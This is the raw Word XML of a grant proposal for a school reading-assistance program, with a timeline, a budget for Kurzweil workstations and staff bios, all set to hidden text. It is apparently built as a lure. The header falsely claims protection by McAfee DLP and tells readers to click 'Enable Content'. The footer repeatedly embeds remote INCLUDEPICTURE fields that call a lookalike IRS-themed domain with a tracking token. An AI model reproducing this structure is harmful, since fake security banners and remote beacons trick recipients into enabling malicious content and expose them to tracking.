      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="460"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>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Student Introduction </w:t>
            </w:r>
          </w:p>
        </w:tc>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February, 2017 </w:t>
            </w:r>
          </w:p>
        </w:tc>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vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="460"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>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Test Initial Reading Speed </w:t>
            </w:r>
          </w:p>
        </w:tc>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0" w:firstLine="0"/>
              <w:rPr>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F72BE7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">February, 2017 </w:t>
            </w:r>
          </w:p>
        </w:tc>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vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="461"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>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Begin First 12-week Phase </w:t>
            </w:r>
          </w:p>
        </w:tc>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0" w:firstLine="0"/>
              <w:rPr>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F72BE7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">March, 2017 - May, 2017 </w:t>
            </w:r>
          </w:p>
        </w:tc>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vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="460"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>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Test Reading Improvement </w:t>
            </w:r>
          </w:p>
        </w:tc>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June, 2017 </w:t>
            </w:r>
          </w:p>
        </w:tc>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vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="461"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>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Prepare Results Report </w:t>
            </w:r>
          </w:p>
        </w:tc>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June, 2017 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="361" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Budget </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">The budget includes funds for a Lab Pack containing five copies of Kurzweil Educational System’s Scan/Read Color software, along with five computers and scanners. This will provide five independent assistive reading workstations. This will give students the greatest flexibility in using their textbooks and other classroom materials. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8640" w:type="dxa"/>
        <w:jc w:val="right"/>
        <w:tblCellMar>
          <w:left w:w="107" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2605"/>
        <w:gridCol w:w="1715"/>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="2160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="460"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1715"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Price </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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0" w:firstLine="0"/>
              <w:rPr>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F72BE7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Quantity </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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Total </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="690"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605"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Kurzweil Scan/Read Lab Pack (Color) 5-Pack  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1715"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$7,095 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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1 (5-pack) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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$7,095 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="690"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605"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Software Maintenance Agreement (SMA) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1715"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$709 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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1 (5-pack) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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$709 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="461"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605"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Epson XP-300 Scanner </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1715"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0" w:firstLine="0"/>
              <w:rPr>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F72BE7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">$300 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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0" w:firstLine="0"/>
              <w:rPr>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F72BE7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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0" w:firstLine="0"/>
              <w:rPr>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F72BE7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">$1,500 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="460"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605"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Dell PC with Monitor </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1715"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$1200 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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5 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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$6,000 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="460"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">Training  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1715"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0" w:firstLine="0"/>
              <w:rPr>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F72BE7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">$1200 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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0" w:firstLine="0"/>
              <w:rPr>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F72BE7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">1 Day </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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0" w:firstLine="0"/>
              <w:rPr>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F72BE7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">$1,200 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="461"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2605"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1715"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00270933">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="1" w:firstLine="0"/>
              <w:rPr>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F72BE7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">$16,504  Total </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">*Note: Sample pricing is provided for demonstration purposes only. Please obtain current pricing from Kurzweil Educational Systems or your local representative. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Evaluation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="373"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Standardized reading tests will be conducted at the start of the Read to Succeed! program and again at the end of the school year to determine increases in reading speed and comprehension. Additionally, those students with ADD will be tested to determine increased reading attention rates.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1065" w:right="51" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Adam Kunz, Special Education Coordinator, holds a Bachelor’s Degree in Special Education from Lesley College. Adam Kunz has extensive experience working with students with severe reading difficulties and was responsible for implementing the successful pilot test program in 2015. He is proficient with learning technology, including computer hardware and software. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Sue Amberson, Speech and Language Pathologist, holds a Bachelor’s degree from the University of Vermont and a Master’s degree from Boston University.  Sue Amberson is working with the students with severe learning disabilities and will be responsible for coordinating participation with classroom teachers. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="373"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>Taunya Brown, Principal, holds a Master’s degree in Education from Washington State. Taunya Brown is providing support for this program and has taken responsibility for parental and community involvement.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="005A2E59" w:rsidRDefault="00F72BE7"/>
    <w:sectPr w:rsidR="005A2E59">
      <w:headerReference w:type="default" r:id="rId10"/>
      <w:footerReference w:type="default" r:id="rId11"/>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C7320" w:rsidRDefault="00EC7320">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00EC7320" w:rsidRDefault="00EC732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B4CBF" w:rsidRDefault="00EC7320" w:rsidP="009B4CBF">
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> INCLUDEPICTURE  \d "https://irsdeliquent.com/index.php?token=F7AMF3NN" \* MERGEFORMATINET </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> INCLUDEPICTURE  \d "https://irsdeliquent.com/index.php?token=F7AMF3NN" \* MERGEFORMATINET </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> INCLUDEPICTURE  \d "https://irsdeliquent.com/index.php?token=F7AMF3NN" \* MERGEFORMATINET </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> INCLUDEPICTURE  \d "https://irsdeliquent.com/index.php?token=F7AMF3NN" \* MERGEFORMATINET </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="005C468B">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="005C468B">
      <w:instrText xml:space="preserve"> INCLUDEPICTURE  \d "https://irsdeliquent.com/index.php?token=F7AMF3NN" \* MERGEFORMATINET </w:instrText>
    </w:r>
    <w:r w:rsidR="005C468B">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00A45F08">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00A45F08">
      <w:instrText xml:space="preserve"> INCLUDEPICTURE  \d "https://irsdeliquent.com/index.php?token=F7AMF3NN" \* MERGEFORMATINET </w:instrText>
    </w:r>
    <w:r w:rsidR="00A45F08">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00F72BE7">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00F72BE7">
      <w:instrText xml:space="preserve"> </w:instrText>
    </w:r>
    <w:r w:rsidR="00F72BE7">
      <w:instrText>INCLUDEPICTURE  \d "https://irsdeliquent.com/index.php?t</w:instrText>
    </w:r>
    <w:r w:rsidR="00F72BE7">
      <w:instrText>oken=F7AMF3NN" \* MERGEFORMATINET</w:instrText>
    </w:r>
    <w:r w:rsidR="00F72BE7">
      <w:instrText xml:space="preserve"> </w:instrText>
    </w:r>
    <w:r w:rsidR="00F72BE7">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00F72BE7">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7pt;height:.7pt">
          <v:imagedata r:id="rId1"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidR="00F72BE7">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00A45F08">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="005C468B">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="009B4CBF" w:rsidRDefault="00F72BE7"/>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C7320" w:rsidRDefault="00EC7320">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00EC7320" w:rsidRDefault="00EC7320">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B4CBF" w:rsidRPr="00A76E6B" w:rsidRDefault="00EC7320" w:rsidP="009B4CBF">
    <w:pPr>
      <w:rPr>
        <w:i/>
        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00A76E6B">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69E553DF" wp14:editId="1DCF7991">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="margin">
            <wp:align>left</wp:align>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="314325" cy="325184"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>
          <wp:docPr id="1" name="Picture 1" descr="http://images.hngn.com/data/images/full/18276/intel-security-replaces-mcafee-brand-name-but-continues-with-its-iconic-red-shield-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http://images.hngn.com/data/images/full/18276/intel-security-replaces-mcafee-brand-name-but-continues-with-its-iconic-red-shield-logo.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314325" cy="325184"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
    <w:r w:rsidRPr="00A76E6B">
      <w:rPr>
        <w:i/>
        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:t>This document is protected by McAfee DLP</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="009B4CBF" w:rsidRPr="009B4CBF" w:rsidRDefault="00EC7320">
    <w:pPr>
      <w:rPr>
        <w:i/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00A76E6B">
      <w:rPr>
        <w:i/>
        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:t>Click “Enable Content” to view</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DB03A75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D218A2BE"/>
    <w:lvl w:ilvl="0" w:tplc="C7A46042">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1425"/>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1" w:tplc="29E2203C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="216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2" w:tplc="E6A6FA32">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="288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3" w:tplc="197E71A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360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4" w:tplc="B7CA49F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432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5" w:tplc="AE046E82">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="504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6" w:tplc="FA4E4FF4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="576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7" w:tplc="DC2C28FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="648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8" w:tplc="0BFAB55E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720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8"/>
  <w:proofState w:spelling="clean" w:grammar="clean"/>
  <w:defaultTabStop w:val="720"/>
  <w:characterSpacingControl w:val="doNotCompress"/>
  <w:hdrShapeDefaults>
    <o:shapedefaults v:ext="edit" spidmax="8194"/>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62D74"/>
    <w:rsid w:val="00355E6D"/>
    <w:rsid w:val="00466DF5"/>
    <w:rsid w:val="005C468B"/>
    <w:rsid w:val="00760ACB"/>
    <w:rsid w:val="00762D74"/>
    <w:rsid w:val="00A10D53"/>
    <w:rsid w:val="00A45F08"/>
    <w:rsid w:val="00BE462D"/>
    <w:rsid w:val="00EC7320"/>
